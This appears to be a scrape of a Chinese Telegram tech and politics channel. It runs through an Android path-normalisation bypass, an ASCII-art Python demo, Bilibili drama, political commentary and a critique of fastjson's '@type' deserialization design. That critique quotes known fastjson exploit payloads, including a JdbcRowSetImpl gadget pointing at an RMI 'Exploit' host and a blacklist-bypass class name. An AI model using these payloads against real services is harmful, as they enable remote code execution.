#android #linux #security 幽默 utf8_casefold 大小写合并算法冲突 🤣 unicode迫真一致化
所以还是用 bytes 算了吧,大小写整什么花活, 幼稚程度堪比log4j或者在shellUI加广告的win10
FUSE 和 kernel GKI 的实现不一样,导致
> 从此,指向存储空间的路径,例如
如果用户空间在比较路径时没有执行与内核相同的步骤,会引入安全问题,导致本应拒绝访问的路径被绕过。需要重点检查FileProvider逻辑,如果它对外提供对共享存储空间文件的访问权限,私有存储不受影响。
所以还是用 bytes 算了吧,大小写整什么花活, 幼稚程度堪比log4j或者在shellUI加广告的win10
FUSE 和 kernel GKI 的实现不一样,导致
/Android /.. 既不在访问黑名单里,syscall也解析到原地址> 从此,指向存储空间的路径,例如
/storage/emulated/0/Android/data,由于 emulated 是 fuse,其底层是 /data/media,所以从 0 开始 (包括),可以在任意位置插入默认可忽略代码点,内核自动删除它们。如果用户空间在比较路径时没有执行与内核相同的步骤,会引入安全问题,导致本应拒绝访问的路径被绕过。需要重点检查FileProvider逻辑,如果它对外提供对共享存储空间文件的访问权限,私有存储不受影响。
duangsuse::Echo
#video #acg 《罗小黑战记》番外《晚安喵》中文彩色字符画版剪辑 [相关信息]
https://www.fxzhihu.com/question/4598614819/answer/37786364436 #bilibili 炒冷饭
我语文能力不好, 这个答主说的在理, TM 两行代码的东西,矩形片map成单字符像素的,Linux 小白都会玩(cowsay-alike),你抄抄抄……
我教 #py 都不敢写这么简单的例子,这垃圾功能也懒得用C凑字数
😅最崩不住的是,这撕还摁造了个高材理工男人设,git clone 都不会,MIT都不懂,贡献代码?也是奇葩
#code heart ASCII ❤️
https://asciinema.org/a/95472 ANSI粒子
https://zhangshuqiao.org/2018-05/有趣的Linux命令行工具/ 有天气预报
#tool curl -4 http://wttr.in
我语文能力不好, 这个答主说的在理, TM 两行代码的东西,矩形片map成单字符像素的,Linux 小白都会玩(cowsay-alike),你抄抄抄……
我教 #py 都不敢写这么简单的例子,这垃圾功能也懒得用C凑字数
😅最崩不住的是,这撕还摁造了个高材理工男人设,git clone 都不会,MIT都不懂,贡献代码?也是奇葩
#code heart ASCII ❤️
import os, cv2, time
from numpy import*
Nm=array; mix=interp
sh=lambda s: os.popen(s).read()[:-1]
def heart(P, k=.8):
t = mix(mod(iTime, k), [0, k], [0.3, k]) # Heartbeat
r = (P[1] - power(abs(P[0]), t))**2 + P[0]**2 - 1.0 # Grayscale function
return where(r < 0.3, mix(-r, [0, 0.3], [1, 4]), r)
grays = Nm([*" .-:", '\x1B[1;31m=\x1B[0m', *"+*%@#"])
GL=lambda w,h: Nm(meshgrid(linspace(0,1, w), linspace(1,0, h)))
def drawBW(g, wh=flip(int32(sh('stty size').split())), bg=grays):
a=(1-g(GL(*wh)*5-2-sin(iTime)))*256 if callable(g) else cv2.cvtColor(cv2.resize(g, wh) , cv2.COLOR_BGR2GRAY)
b=int8(mix(a, (0,256), (0,len(bg)-1) ))
print('\x1B[0;0H', '\n'.join(''.join(y) for y in bg[b] ))
try: #.: ipy -i
@get_ipython().pt_app.key_bindings.add('c-k')
def cropBW(F5):
g=cv2.imread(sh('zenity --file-selection'))
drawBW(g)
except:
for iTime in (x/100 for x in range(0, 600)): drawBW(heart); time.sleep(1/60)
https://asciinema.org/a/95472 ANSI粒子
https://zhangshuqiao.org/2018-05/有趣的Linux命令行工具/ 有天气预报
#tool curl -4 http://wttr.in
FxZhihu / Fixup Zhihu
如何看待哔哩哔哩up“老师好我叫何同学”最新视频无授权使用开源项目的代码? - @巨蜥拉卡 | FxZhihu
可能有很多吃瓜群众不知道这事儿的魔幻程度,这里专门解释一下这个ASCII-Generator的技术含量,业余python爱好者,大家看个乐子不要深究。 做ASCII字符画的形式有很多种,其中通过量化图像然后用不同“浓度”的字符来代替黑白对比度的这种方式,根据Wikipedia的说法 [1],是1960年代就有的事儿: [图片] 具体流程其实猜也能猜的到:图像是像素构成的,我把图像转成黑白的,分成若干小块,每个小块的像素亮度求个平均值,亮度高的,用点(.…
duangsuse::Echo
#cg #code 国产剧《点燃我,温暖你》/110w 里面的一个桥段,天才程序员男主李峋期中考试中完成的爱心代码 效仿评论区就自己写了个…… 另外GL里字体/for循环是较难的 float heart(vec2 P) { float t= mix(.3,.8, mod(iTime,1.2)),//心跳 r=pow(P.y-pow(abs(P.x),t), 2.)+pow(P.x,2.) -1.;//灰度函数 return r<.3? mix(1.,4.,-r) : r; //黑心换白心…
This media is not supported in your browser
VIEW IN TELEGRAM
纯sdf, 顺手移植了一个给 numpy+tty
花了1小时吧:
cv2.open(mode=HSL亮L).降采样为(stty size) mix(256色到" .*#"色) .追加\n列 .光标到(0,0)print
我用了比yes命令内存效能低的join'',但也不打紧
#performance fwrite() 就像CtrlV,要打'y'*500你是粘贴五百次还是多复制、缓冲?
把rows('<U1').buf分隔复制到 int8(w*h+1h),按帧yield给/dev/pts/0管道更省
若一开始就 open(w+1'\n',h) 就是SIMD汇编一样快了,当然,0copy 不如 diff update ,之前逐px试过确实。
有时看 #bilibili 编程圈,感觉是「时无英雄竖子成名」,比如那个开「知识」星球赚百w的鱼皮
像🐴一龙那样因追求,最终有钱的少,更多技术人有比钱更高的需求。
在老中这很搞笑很虚伪吧? #statement
不过我是很清楚,B站上真大佬有 #algorithm #OI 的一大堆, @从0开始数 就是,
其实是学生们只喜欢看抽象的「编程娱乐直播」 JavaWeb PHP 什么的曾经很赚钱的 🥰 甚至不一定要有代码,可敬抄嘛,
那个微信首屏卡成 🐴,音视频通话按钮都混乱,拿AI做避讳和偷窥这样的脏事, 还一堆人 pixel perfect 地致敬张小龙,其实就是这种大厂功利心态,
何同学呢? 作为主=5G的第二个受益者 ,其实不配说热爱 奋斗 赛博丁真
花了1小时吧:
cv2.open(mode=HSL亮L).降采样为(stty size) mix(256色到" .*#"色) .追加\n列 .光标到(0,0)print
我用了比yes命令内存效能低的join'',但也不打紧
#performance fwrite() 就像CtrlV,要打'y'*500你是粘贴五百次还是多复制、缓冲?
把rows('<U1').buf分隔复制到 int8(w*h+1h),按帧yield给/dev/pts/0管道更省
若一开始就 open(w+1'\n',h) 就是SIMD汇编一样快了,当然,0copy 不如 diff update ,之前逐px试过确实。
有时看 #bilibili 编程圈,感觉是「时无英雄竖子成名」,比如那个开「知识」星球赚百w的鱼皮
像🐴一龙那样因追求,最终有钱的少,更多技术人有比钱更高的需求。
在老中这很搞笑很虚伪吧? #statement
不过我是很清楚,B站上真大佬有 #algorithm #OI 的一大堆, @从0开始数 就是,
其实是学生们只喜欢看抽象的「编程娱乐直播」 JavaWeb PHP 什么的曾经很赚钱的 🥰 甚至不一定要有代码,可敬抄嘛,
那个微信首屏卡成 🐴,音视频通话按钮都混乱,拿AI做避讳和偷窥这样的脏事, 还一堆人 pixel perfect 地致敬张小龙,其实就是这种大厂功利心态,
何同学呢? 作为主=5G的第二个受益者 ,其实不配说热爱 奋斗 赛博丁真
https://www.fxzhihu.com/question/4598614819/answer/37682686698 【代码姜萍】:我超似你的 🦄
丁真是理塘的骄傲,何同学是北邮的耻辱。
#CS 校友都能均衡学习 https://www.chenxutalk.top/posts/bugs/bupt-courses/#编译原理与技术
代码姜萍却连拖库都要外包
丁真是理塘的骄傲,何同学是北邮的耻辱。
#CS 校友都能均衡学习 https://www.chenxutalk.top/posts/bugs/bupt-courses/#编译原理与技术
代码姜萍却连拖库都要外包
FxZhihu / Fixup Zhihu
如何看待哔哩哔哩up“老师好我叫何同学”最新视频无授权使用开源项目的代码? - @牧谷晨风 | FxZhihu
以前说【赛博丁真】是辱何同学,现在说【赛博丁真】就是辱丁真了,因为丁真有六胜: 1.业务方面:丁真的玩马水平高过何同学的玩码水平,此为一胜 2.道德方面:丁真遵纪守法,没偷过别人家的马;何同学实锤偷别人家的码了,此为二胜 3.外观方面:丁真颜值高过何同学,此为三胜 4.背景方面:双方的背后都是官家,但丁真是少数民族,统战价值更高,所以丁真赢,此为四胜 5.职业方面:丁真有编制,收入稳定;何同学自由职业,收入不稳…
https://www.bilibili.com/video/BV1zG4y1f7c7 🤔.. 码农搞天
这个人比较有素质,锐评了丁真对MIT自作聪明。 但对于清华毕业,微软员工,Python核心开发者, 还有点信息差……
其实这个CG挺无聊的,也就对前端后端稀奇, offscreencanvas.com 那种才是标准
在找些 3D demo 时,发现他是我4年前的水平.. 那时候总觉得自己比编译器比lib聪明,不重视简洁明确,也罢。 最近有「清华拳」南开辅导员,也是IT男。
不过他挺有意思的 😅 没有真去算particles或noise,而是用mp4的PIL(cv2) 粘贴旧帧,还用了js canvas.. 也是比何同学 ASCII art 用的技术牛逼点,我搞过
https://t.me/dsuse/18702
200行代码交给iq能做到 shadertoy.com/view/4lK3Rc
>在一场C语言开卷考试中,和自己的清华大学男友通过腾讯文档共享来作弊,被一位临时担任监考老师的大四辅导员发现。
好像,也就是美帝资助的学堂罢了。
这个人比较有素质,锐评了丁真对MIT自作聪明。 但对于清华毕业,微软员工,Python核心开发者, 还有点信息差……
其实这个CG挺无聊的,也就对前端后端稀奇, offscreencanvas.com 那种才是标准
在找些 3D demo 时,发现他是我4年前的水平.. 那时候总觉得自己比编译器比lib聪明,不重视简洁明确,也罢。 最近有「清华拳」南开辅导员,也是IT男。
不过他挺有意思的 😅 没有真去算particles或noise,而是用mp4的PIL(cv2) 粘贴旧帧,还用了js canvas.. 也是比何同学 ASCII art 用的技术牛逼点,我搞过
https://t.me/dsuse/18702
200行代码交给iq能做到 shadertoy.com/view/4lK3Rc
>在一场C语言开卷考试中,和自己的清华大学男友通过腾讯文档共享来作弊,被一位临时担任监考老师的大四辅导员发现。
好像,也就是美帝资助的学堂罢了。
Bilibili
这才叫爱心代码完美复刻,不要再用原剧视频骗人了_哔哩哔哩_bilibili
《点燃我温暖你》中李峋的爱心代码,我完美复刻出来了。只不过这种复刻方式,多少显得有些赖皮~, 视频播放量 65653、弹幕量 170、点赞数 3367、投硬币枚数 1071、收藏人数 798、转发人数 407, 视频作者 码农高天, 作者简介 清华毕业,Python核心开发者。知乎:高天。,相关视频:这个是真的复刻出来了!#李峋同款爱心(有源码),国产程序员剧里的爱心代码,算是完美复刻吗?,这应该是全网最美李洵爱心代码实现了吧-附实现思路讲解,【C语言爱心代码】用心又好看的爱心来啦!几行代码教你表白心仪…
#china 最近献忠禁报了☺️舒心~
唉,学宣传学的 https://m.youtube.com/watch?v=Zh6FpWdxVM4
https://m.youtube.com/watch?v=DsNkGduKqzU Louise 整理了法制的失序
#hk 未来有拿身份证的风险, 言论和劳权自由 有被共走的取向
未来的意识形态,是左,是民粹(对内对外 不平等),还是自由法制?
信🐱信希特勒的人不少。 我们在西方看来确实是恐怖主义地区了, 赞助鹅爹,联盟CRINK,献祭小学生,开车歼35
唉,学宣传学的 https://m.youtube.com/watch?v=Zh6FpWdxVM4
https://m.youtube.com/watch?v=DsNkGduKqzU Louise 整理了法制的失序
#hk 未来有拿身份证的风险, 言论和劳权自由 有被共走的取向
未来的意识形态,是左,是民粹(对内对外 不平等),还是自由法制?
信🐱信希特勒的人不少。 我们在西方看来确实是恐怖主义地区了, 赞助鹅爹,联盟CRINK,献祭小学生,开车歼35
YouTube
方脸说:一个剧变的时代正在到来!中国正在经历一场类似于1979年的巨大变革!回顾中国近几年旧秩序瓦解的过程!
欢迎加入我的会员:https://www.youtube.com/channel/UCzYYzigb1vXR0GQXXBja2kg/join
欢迎关注我的推特:https://x.com/torontobigface
欢迎关注我的推特:https://x.com/torontobigface
duangsuse::Echo
https://offscreencanvas.com/renders/advanced-ascii-rendering/ btw. 随便逛逛引文就会发现伪字符画 0xAA 这种,其实可以做到好的多的效果 不管你用 #js 还是什么,不管你多少岁,只要思想不滑坡,程序员的世界本该是这样的。 所以我不大喜欢何同学的那种,刻板印象 js和c的 4K-intro 可以看 https://www.zhihu.com/question/420656795/answer/1509103813 http://js1k.com/2010…
#china #dev #经济 http://www.bilibili.com/video/BV1dfBHY4EHg
>
现在应该老实了,一大堆人在谴责为什么要抽向弱者
按照社达的理论,干不过汽车大棒刀子的不是活该被淘汰? 🤗
开车过来社达就老实了?筛选出跑得比车还快的人类出来,还得比汽车硬 😡
按照社达的逻辑,人最多活35……婴儿期就度不过。动物世界可是喜欢吃老的和小的
——我教教你怎么爱国。“谁不招35岁以上员工,我们就抵制谁。不买他的产品、不看他的广告、不接他的代言,直到把他抵制到愿意招为止”。
>
我才不怕战争,一听到战争我就兴奋。战争的代价嘛,无非是死亡。咱就是一个普通老百姓,命不值钱。
如果没有战争,一辈子也就那样了,不会有大出息。上战场运气好立个战功,下来后混个官当当就知足了。
早打,大打,打核战争
>
现在应该老实了,一大堆人在谴责为什么要抽向弱者
按照社达的理论,干不过汽车大棒刀子的不是活该被淘汰? 🤗
开车过来社达就老实了?筛选出跑得比车还快的人类出来,还得比汽车硬 😡
按照社达的逻辑,人最多活35……婴儿期就度不过。动物世界可是喜欢吃老的和小的
——我教教你怎么爱国。“谁不招35岁以上员工,我们就抵制谁。不买他的产品、不看他的广告、不接他的代言,直到把他抵制到愿意招为止”。
>
我才不怕战争,一听到战争我就兴奋。战争的代价嘛,无非是死亡。咱就是一个普通老百姓,命不值钱。
如果没有战争,一辈子也就那样了,不会有大出息。上战场运气好立个战功,下来后混个官当当就知足了。
早打,大打,打核战争
Bilibili
视频去哪了呢?_哔哩哔哩_bilibili
undefined, 视频播放量 undefined、弹幕量 undefined、点赞数 undefined、投硬币枚数 undefined、收藏人数 undefined、转发人数 undefined, 视频作者 undefined, 作者简介 undefined,相关视频:
duangsuse::Echo
#china #people 历史:习之后,党内反对的声音 「他們拿出來欺騙別人的東西,但是我們把它當真了。然後當你看到他的說法和事實是不一樣的,而你是真誠的信奉必須要走向公平正義的東西,你會堅持,你就會變成這樣。」 https://zh.wikipedia.org/zh-tw/蔡霞 在任志强(党媒不可姓党)、李文亮(言论自由联署)后使她处境愈发尴尬 在环保异见者被警察致死掩盖案彻底决裂,后滞留美国,因私下录音“政治僵尸”“黑社会”无法回国 意识形态和口号党校教授、主张党内民主 回忆录 https:…
YouTube
"经右政左"三步曲,民企退场中国经济熄火
习近平2012年执政以来,一个“反腐”,两个“毫不动摇”,三个“宣传会议讲话版本”,“四个意识”,李嘉诚跑了!中国经济如何步步走向绝境?《蔡霞有话说》为您梳理和分析。
==========================================
**美国之音新闻应用程序**
美国之音新闻应用程序全新改版,让您快速掌握新闻与资讯!欢迎通过苹果、谷歌应用程序商店下载免费的美国之音新闻应用程序!
苹果 https://bit.ly/VOAnewsapp2021iOS
安卓 https://bit.l…
==========================================
**美国之音新闻应用程序**
美国之音新闻应用程序全新改版,让您快速掌握新闻与资讯!欢迎通过苹果、谷歌应用程序商店下载免费的美国之音新闻应用程序!
苹果 https://bit.ly/VOAnewsapp2021iOS
安卓 https://bit.l…
duangsuse::Echo
https://x.com/whyyoutouzhele/status/1816770434508976560 #kt Kotlin Multiplatform 是迄今为止最优秀的跨平台方案 https://bytedance.host/231204/ #db https://tangdh.life/posts/database/duckdb-file/ http://blog.asleson.org/2024/07/24/bcachefs-an-introduction/exploration/
https://blog.lxscloud.top/2022/12/29/记一次请求伪混淆实验/ #net #freedom
https://www.zhihu.com/question/653647449 🙉大记忆恢复术!
>想抓的话一抓一个准
真是有点佩服贱忠圈互联网对自由世界隐私意识的意淫能力。 都2024了什么技术没有,靠偷开源,就精神胜利是吧?不够本。 有能耐把爱因斯坦和胡适抓回来批斗 😊
红小将恨民党能找到阮老师,是因为他揭露权贵/腐败前就在豆瓣。搜索引擎上都公开有,搜同图搜同书名就知道,即便这样,这帮法西斯饭桶还是找了10年。 阮只是装作重视匿名性,如同反贼声称自己在国外(yt上有不少北上广),红小将就被带歪了方向,那如果是真的呢? 和忠教品牌华为的芯片一样可悲。
而恐吓爆炸的韩裔学生,在哈佛网络ISP上直连Tor+10min mail ,这种特征都不会藏,学个毛的心理学。
>国内一般是蜜罐代理给VPN当前置,最后一步再接Tor, tor over rdp.. 现在大把Tr的sni还是用 update.windows.com 伪装成 windows 升级的流量
>接入Tor的是自己的海外服务器,而接入网络的方式是餐馆咖啡店的匿名wifi。
这些讽刺日本能信用卡诈骗的贼始终不知道,警察社会才是运行不下去的。 以前地铁在那表演安检,现在国内频繁歼35还不知情,无新闻,如同鲁迅所言的那个黑屋子, 啧啧
https://www.zhihu.com/question/653647449 🙉大记忆恢复术!
>想抓的话一抓一个准
真是有点佩服贱忠圈互联网对自由世界隐私意识的意淫能力。 都2024了什么技术没有,靠偷开源,就精神胜利是吧?不够本。 有能耐把爱因斯坦和胡适抓回来批斗 😊
红小将恨民党能找到阮老师,是因为他揭露权贵/腐败前就在豆瓣。搜索引擎上都公开有,搜同图搜同书名就知道,即便这样,这帮法西斯饭桶还是找了10年。 阮只是装作重视匿名性,如同反贼声称自己在国外(yt上有不少北上广),红小将就被带歪了方向,那如果是真的呢? 和忠教品牌华为的芯片一样可悲。
而恐吓爆炸的韩裔学生,在哈佛网络ISP上直连Tor+10min mail ,这种特征都不会藏,学个毛的心理学。
>国内一般是蜜罐代理给VPN当前置,最后一步再接Tor, tor over rdp.. 现在大把Tr的sni还是用 update.windows.com 伪装成 windows 升级的流量
>接入Tor的是自己的海外服务器,而接入网络的方式是餐馆咖啡店的匿名wifi。
这些讽刺日本能信用卡诈骗的贼始终不知道,警察社会才是运行不下去的。 以前地铁在那表演安检,现在国内频繁歼35还不知情,无新闻,如同鲁迅所言的那个黑屋子, 啧啧
#sql #history https://www.fxzhihu.com/question/419913304/answer/3416608114
https://www.zhihu.com/question/35745351/answer/334610655 pwsh vs zsh , #os 设计
https://www.zhihu.com/question/35745351/answer/334610655 pwsh vs zsh , #os 设计
FxZhihu / Fixup Zhihu
服务器为什么大多用 Linux? - @熊大你又骗俺 | FxZhihu
作为一个已经落伍的人,只能谈谈当年的所见所闻了。 首先,在20年前,windows server+iis+asp+access,这套方案,在还是流行过一段时间的。 因为开发起来太简单了,太特么快了,非常适合一些内容发布频率很低的小企业网站。 国内早期有个很火爆的论坛源码产品,就是用asp+access做的,叫做“动网论坛”,即DVBBS。 对于啥都不懂的小白来说,DVBBS这种玩意儿是真省事啊! 组件里打开安装IIS,直接把DVBBS往站点根目录一仍,就行了…
https://github.com/tuteng/Best-websites-a-programmer-should-visit-zh?tab=readme-ov-file#针对那些想开始一个小的项目但是无从下手的人
#tool awesome list
#dev #learn 公案 zen 入门 https://github.com/ts25504/awesome-koans#:~:text=编程语言的学习也有一种公案形式的学习方法,是我见过的最好的学习一门新的编程语言的方式
重构浣熊 🐿收录的10种流行 #OOP Design Pattern 掩盖了哪些语言特性的缺失 ?
https://refactoring.guru/refactoring/when
https://www.ruanyifeng.com/blog/2017/02/fp-tutorial.html
#web #design 推荐 https://component-party.dev/
https://github.com/RimoChan/match-you/blob/slave/mother.kt :偷偷发给同事启动,他电脑上装好的依赖就会被删掉,然后他就得自己配环境了!..
#tool awesome list
#dev #learn 公案 zen 入门 https://github.com/ts25504/awesome-koans#:~:text=编程语言的学习也有一种公案形式的学习方法,是我见过的最好的学习一门新的编程语言的方式
重构浣熊 🐿收录的10种流行 #OOP Design Pattern 掩盖了哪些语言特性的缺失 ?
https://refactoring.guru/refactoring/when
https://www.ruanyifeng.com/blog/2017/02/fp-tutorial.html
#web #design 推荐 https://component-party.dev/
https://github.com/RimoChan/match-you/blob/slave/mother.kt :偷偷发给同事启动,他电脑上装好的依赖就会被删掉,然后他就得自己配环境了!..
GitHub
GitHub - tuteng/Best-websites-a-programmer-should-visit-zh: 程序员应该访问的最佳网站中文版
程序员应该访问的最佳网站中文版. Contribute to tuteng/Best-websites-a-programmer-should-visit-zh development by creating an account on GitHub.
duangsuse::Echo
噢对了,之前做一个这个 https://duangsuse.github.io/mkey/making_reco/#sorts3 #algorithm #visualize
https://t.me/hyi0618/5036?comment=6393
#algorithm #visualize
>poetry pip 用 #Rust rewrite #statement
这种类似 docker/chroot 的东西其实C API调用都很少,最复杂的部分反而可能是 CLI getopt 和配置文件模板,根本不需要rust..
rust 的意义就是让我们觉得很Niubility,很neo,但写出来的东西,其实不比拿zsh或py胶水几个包快。 printf "\e[33m黄字" 这样的功能强吗? ruby也能做啊,写那么麻烦没意义,其实就是上情绪价值。
像 Vue 最近那个 oxc ESTree 用Rust才有点意义,因为它背后有一个更简洁通用的数据模型,类似与 tree-sitter vs ANTLR/PEGgyjs.org ,这才是革命性的
#algorithm #visualize
>poetry pip 用 #Rust rewrite #statement
这种类似 docker/chroot 的东西其实C API调用都很少,最复杂的部分反而可能是 CLI getopt 和配置文件模板,根本不需要rust..
rust 的意义就是让我们觉得很Niubility,很neo,但写出来的东西,其实不比拿zsh或py胶水几个包快。 printf "\e[33m黄字" 这样的功能强吗? ruby也能做啊,写那么麻烦没意义,其实就是上情绪价值。
像 Vue 最近那个 oxc ESTree 用Rust才有点意义,因为它背后有一个更简洁通用的数据模型,类似与 tree-sitter vs ANTLR/PEGgyjs.org ,这才是革命性的
Telegram
duangsuse in Channel comments
找了俩更好玩的
https://gallery.selfboot.cn/en/algorithms/dijkstra
https://clementmihailescu.github.io/Pathfinding-Visualizer/#
其实Web上算法+UIUX双修的大佬很多, 一定要找visualized
https://gallery.selfboot.cn/en/algorithms/dijkstra
https://clementmihailescu.github.io/Pathfinding-Visualizer/#
其实Web上算法+UIUX双修的大佬很多, 一定要找visualized
#life 移民 https://www.fxzhihu.com/question/570129737/answer/3379499929
>他在海关被留在问询室(俗称小黑屋)48小时,出来被带到难民安置中心,六个月后放出来得到一张绿条儿(临时工卡),然后就可以合法打工啦。
华人修脚店打工,从见习修脚技师,到修脚技师,到高级修脚技师。过了没几年就有绿卡了,比H1B排期快多了,不知道快多少倍。
我当时看着手里的J1签证陷入了深深的思考,觉得自己活该loser。
胡建免签全球,真不是吹的
>你都不用撕护照,直接六个月C8(BH)卡,无非就是身份过期之前申请,c8工卡很快就下来了。
>求求你们快来吧,现在送外卖和开网约车的越来越贵了,再不来点华人卷真就吃不起外卖了。
>他在海关被留在问询室(俗称小黑屋)48小时,出来被带到难民安置中心,六个月后放出来得到一张绿条儿(临时工卡),然后就可以合法打工啦。
华人修脚店打工,从见习修脚技师,到修脚技师,到高级修脚技师。过了没几年就有绿卡了,比H1B排期快多了,不知道快多少倍。
我当时看着手里的J1签证陷入了深深的思考,觉得自己活该loser。
胡建免签全球,真不是吹的
>你都不用撕护照,直接六个月C8(BH)卡,无非就是身份过期之前申请,c8工卡很快就下来了。
>求求你们快来吧,现在送外卖和开网约车的越来越贵了,再不来点华人卷真就吃不起外卖了。
FxZhihu / Fixup Zhihu
落地撕护照可行吗? - @Lawrence | FxZhihu
我还真见过一个是这么操作的。。。 在美国读书的时候,因为当时的我天真加上懒,一直认为全自动无人驾驶汽车的全面普及就是两三年内的事儿(当时是2016年前后),所以我当时在美国一直拒绝学开车。。。 (这里我必须吐槽一下伊隆马斯克真tm不给力,无人驾驶现在2024了还没弄好呢)当时有一次有事出门,要去机场,30-40分钟车程,只好找了个接送机服务。 来了发现是个中国小伙子,年纪相仿,我以为跟我一样是留学生,谈了几句话发…
#china #sql #java #security #recommend
省流: fastjson 作者实现了前端都不能的
它比JSer在类型检查上更 👈🤡
fastjson 窝槽, Ali 的架构师设计也真是逆天啊!! 2020的分析,今天才看到,狗屎程度堪比 antd 事件
Jackson 真是多亏同行衬托 😅 温高铁还煞有介事在下面装无辜, 晒自己咋优化 Latin-1(8bit)+UTF8 转wchar(16b) 比赢JDK
这里有个问题, IFruit 其实是
那 IFruit 凭啥能在无 backing field 的情况下被databind出来?new java.lang.reflect.Proxy ……😂 var by mapOf(); 没错,他搞笑呢,从性能和structure对应性上这都是fatal
那咋实现 OOP=封装+多态继承 呢? 通过严格定义的 sealed/enum ADT{} ?通过XML?都不是,他懂, Auto "@type"...
脚本引擎都弄出来了呀…… 这画风和js的JSON迥异,生硬如同 new WTF({kwarg:..})
于是计算器就出来了
第一次知道这么脑洞打开的 workaround ,是把 List<*> =Any 泛型擦除当真理了吗, 真当子类多态就是一切皆Object 一切有@type呢, 其实那就是 enum { A(int) B(str) } 的特例而已!👈🤣
最搞的是JDK和这家伙一样喜欢玩魔法,开 1.2.25 blacklist 后
因为直到 1.2.47 ,他都用类似 breakwa11 的黑名单「闭源」来防,拉黑算法还有bug…… 恕我直言,common sense 缺到有点好笑。 还@type呢, {"": "Apple"} 都是合法json,这不得快得废弃来?
(子类多态,var_a:T=b as T1 合法, Fn1<in T,out R> 就可以兼容赋值?super T ,override同理,这才叫懂八股..)
和log4j一样级别的。有时候我都好奇,在一个a[i]的 i±1 都绝对报错的代码世界,在try{return} 都会跳到finally{close..}的事务性严谨圈子里,在 sudo kill -9 随意但弱密码和Thread.stop不允许的稳健文化下,SQLi这种让WAF替你修的语意性混淆咋被容忍的。 弄得好像骇客们RCE进封闭系统如探囊取物,硬件主权全无效似的。
——
compile('select {}+1') (232) 是怎么能和 eval(f'{232}+1') 混为一谈的,代码和常量就这么拼接了?一个扁平一个嵌套分不清吗? 我 模仿JS元编程20行 INI.dumps() 都未曾设想的逆天类型观 ,这就像幻想「富文本」里会有 <script>、fetch() 会带站内cookie执行任意 curl 能做的事,真拿人html/DOM就瞎用,丢的岂止隐私?
唉,草台班子。 「你就说弹calc.exe快不快吧」
这不禁让我想到「一种游戏服务器RPC返回Object的方法」: 直接把0xcafababe..的对象指针传客户端。 😓你怎么验证那句柄是否有效,能够安全写入? set<usize> 还不如 map<int,usize> 快
如果客户端瞎JB暴力指向了admin密码上,或ROP覆盖了return“回调”的函数呢,你是否还记得 x=malloc(N) free(x) 为啥要对「整数x」严格限界、正确配对?
libc 和 Linux 防但防不住的,就是这种撒手掌柜啊 🤡
真是群爱等编译的脚本小子。 Talks
省流: fastjson 作者实现了前端都不能的
JSON.parse('{"__proto__":{"name":"FakeClass"}}') instanceof RealClass它比JSer在类型检查上更 👈🤡
fastjson 窝槽, Ali 的架构师设计也真是逆天啊!! 2020的分析,今天才看到,狗屎程度堪比 antd 事件
Jackson 真是多亏同行衬托 😅 温高铁还煞有介事在下面装无辜, 晒自己咋优化 Latin-1(8bit)+UTF8 转wchar(16b) 比赢JDK
# xx toJSONString : {"sale":{"price":0.5},"name":"Hollis"} 的类结构
.:
- Store-name-sale ["" IFruit]
.: IFruit
- Apple-price [0]
- Free
-xx Store "Hollis" (Apple 0.5)这里有个问题, IFruit 其实是
sealed interface IfFruit{ Apple; Free } ,前者有"price":Int 后者没有field或setter,因此 parse<Store> ("{..}").sale as Apple 只能失败。那 IFruit 凭啥能在无 backing field 的情况下被databind出来?new java.lang.reflect.Proxy ……😂 var by mapOf(); 没错,他搞笑呢,从性能和structure对应性上这都是fatal
那咋实现 OOP=封装+多态继承 呢? 通过严格定义的 sealed/enum ADT{} ?通过XML?都不是,他懂, Auto "@type"...
{
"@type":"com.hollis.lab.fastjson.test.Store",
"fruit":{
"@type":"com.hollis.lab.fastjson.test.Apple",
"price":0.5
},
"name":"Hollis"
}
// 正确做法
{"sale":{type: Apple, "price":0.5},"name":"Hollis"}
// Rust默认做法
name=Hollis
[sale]
Apple={price=0.5}脚本引擎都弄出来了呀…… 这画风和js的JSON迥异,生硬如同 new WTF({kwarg:..})
于是计算器就出来了
{@type:com.sun.rowset.JdbcRowSetImpl, dataSourceName: "rmi://localhost:1099/Exploit"} ,数不清的注入点。{"@type": "jdk.jfr.internal.JVM", "memorySize": 1} , {@type":"com.ibatis.sqlmap.engine.transaction.jta ... 变游乐场了第一次知道这么脑洞打开的 workaround ,是把 List<*> =Any 泛型擦除当真理了吗, 真当子类多态就是一切皆Object 一切有@type呢, 其实那就是 enum { A(int) B(str) } 的特例而已!👈🤣
最搞的是JDK和这家伙一样喜欢玩魔法,开 1.2.25 blacklist 后
lazy(loadClass)("[Lcom.sun.rowset.JdbcRowSetImpl;") 等为方便ASM和反射也是合法类名,和温大佬异想天开的不一样, 修得和安卓 utf8_casefold 大小写合并bypass 一样弱智。真是不能期待他们在RCE 0day后,对OOP和json的强类型理解会有所反思, 因为直到 1.2.47 ,他都用类似 breakwa11 的黑名单「闭源」来防,拉黑算法还有bug…… 恕我直言,common sense 缺到有点好笑。 还@type呢, {"": "Apple"} 都是合法json,这不得快得废弃来?
(子类多态,var_a:T=b as T1 合法, Fn1<in T,out R> 就可以兼容赋值?super T ,override同理,这才叫懂八股..)
和log4j一样级别的。有时候我都好奇,在一个a[i]的 i±1 都绝对报错的代码世界,在try{return} 都会跳到finally{close..}的事务性严谨圈子里,在 sudo kill -9 随意但弱密码和Thread.stop不允许的稳健文化下,SQLi这种让WAF替你修的语意性混淆咋被容忍的。 弄得好像骇客们RCE进封闭系统如探囊取物,硬件主权全无效似的。
——
compile('select {}+1') (232) 是怎么能和 eval(f'{232}+1') 混为一谈的,代码和常量就这么拼接了?一个扁平一个嵌套分不清吗? 我 模仿JS元编程20行 INI.dumps() 都未曾设想的逆天类型观 ,这就像幻想「富文本」里会有 <script>、fetch() 会带站内cookie执行任意 curl 能做的事,真拿人html/DOM就瞎用,丢的岂止隐私?
唉,草台班子。 「你就说弹calc.exe快不快吧」
这不禁让我想到「一种游戏服务器RPC返回Object的方法」: 直接把0xcafababe..的对象指针传客户端。 😓你怎么验证那句柄是否有效,能够安全写入? set<usize> 还不如 map<int,usize> 快
如果客户端瞎JB暴力指向了admin密码上,或ROP覆盖了return“回调”的函数呢,你是否还记得 x=malloc(N) free(x) 为啥要对「整数x」严格限界、正确配对?
libc 和 Linux 防但防不住的,就是这种撒手掌柜啊 🤡
真是群爱等编译的脚本小子。 Talks
知乎专栏
fastjson到底做错了什么?为什么会被频繁爆出漏洞?
